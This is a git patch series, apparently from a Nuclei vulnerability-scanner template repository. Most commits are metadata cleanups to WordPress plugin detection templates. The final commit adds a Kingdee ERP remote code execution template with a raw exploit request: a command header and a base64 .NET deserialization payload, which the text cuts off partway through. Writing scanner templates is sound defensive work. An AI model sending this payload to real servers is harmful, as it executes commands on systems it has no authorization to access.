plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index aa1898c4ba..48ffb25245 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index fba45020e4..56dfdf4a59 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: - max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 09835458f7da83cbf044d460768ea81c6068d360 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 6 Sep 2023 11:11:32 +0530 Subject: [PATCH 0169/1090] added verified --- http/osint/gist.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/http/osint/gist.yaml b/http/osint/gist.yaml index 1716dbc860..9b20ddea10 100644 --- a/http/osint/gist.yaml +++ b/http/osint/gist.yaml @@ -9,9 +9,11 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: osint,osint-coding,gist,github metadata: max-request: 1 + verified: true + tags: osint,osint-coding,gist,github + self-contained: true http: @@ -21,11 +23,11 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body words: - "p-nickname vcard-username d-block" + + - type: status + status: + - 200 From 4ae1c130871f79f2badea6376b3873f5bcaad9ac Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 6 Sep 2023 11:47:20 +0530 Subject: [PATCH 0170/1090] Create kingdee-erp-rce.yaml --- .../other/kingdee-erp-rce.yaml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/vulnerabilities/other/kingdee-erp-rce.yaml diff --git a/http/vulnerabilities/other/kingdee-erp-rce.yaml b/http/vulnerabilities/other/kingdee-erp-rce.yaml new file mode 100644 index 0000000000..0b33f6697e --- /dev/null +++ b/http/vulnerabilities/other/kingdee-erp-rce.yaml @@ -0,0 +1,38 @@ +id: kingdee-erp-rce + +info: + name: Kingdee OA Yunxingkong kdsvc - Remote Code Execution + author: SleepingBag945 + severity: critical + description: | + Kingdee OA Yunxingkong has a remote command execution vulnerability. This vulnerability is caused by the fact that the communication layer of Kingdee Cloud Starry Sky Management Center adopts binary data format by default, which requires serialization and deserialization. No signature or verification is performed during this communication process, leading to malicious exploitation. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%87%91%E8%9D%B6OA/%E9%87%91%E8%9D%B6OA%20%E4%BA%91%E6%98%9F%E7%A9%BA%20kdsvc%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + fofa-query: app="金蝶云星空-管理中心" + verified: true + tags: kingdee-erp,rce,intrusive + +http: + - raw: + - | + POST /Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1 + Host: {{Hostname}} + cmd: ipconfig + Content-Type: text/json + + {"ap0":"AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNvbGxlY3Rpb25zLkhhc2h0YWJsZQcAAAAKTG9hZEZhY3RvcgdWZXJzaW9uCENvbXBhcmVyEEhhc2hDb2RlUHJvdmlkZXIISGFzaFNpemUES2V5cwZWYWx1ZXMAAAMDAAUFCwgcU3lzdGVtLkNvbGxlY3Rpb25zLklDb21wYXJlciRTeXN0ZW0uQ29sbGVjdGlvbnMuSUhhc2hDb2RlUHJvdmlkZXII7FE4PwIAAAAKCgMAAAAJHwAAAAkgAAAADw0AAAAAEAAAAk1akAADAAAABAAAAP//AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAOH7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAUEUAAEwBAwAnQZBkAAAAAAAAAADgAAIhCwELAAAIAAAABgAAAAAAAP4mAAAAIAAAAEAAAAAAABAAIAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAgAAAAAIAAAAAAAADAECFAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAACkJgAAVwAAAABAAACoAgAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAgAAAAAAAAAAAAAAAggAABIAAAAAAAAAAAAAAAudGV4dAAAAAQHAAAAIAAAAAgAAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAACoAgAAAEAAAAAEAAAACgAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAADAAAAABgAAAAAgAAAA4AAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAA4CYAAAAAAABIAAAAAgAFADAhAAB0BQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbMAMAwwAAAAEAABECKAMAAAooBAAACgoGbwUAAApvBgAACgZvBwAACm8IAAAKcwkAAAoLB28KAAAKcgEAAHBvCwAACgZvDAAACm8NAAAKchEAAHBvDgAACgwHbwoAAApyGQAAcAgoDwAACm8QAAAKB28KAAAKF28RAAAKB28KAAAKF28SAAAKB28KAAAKFm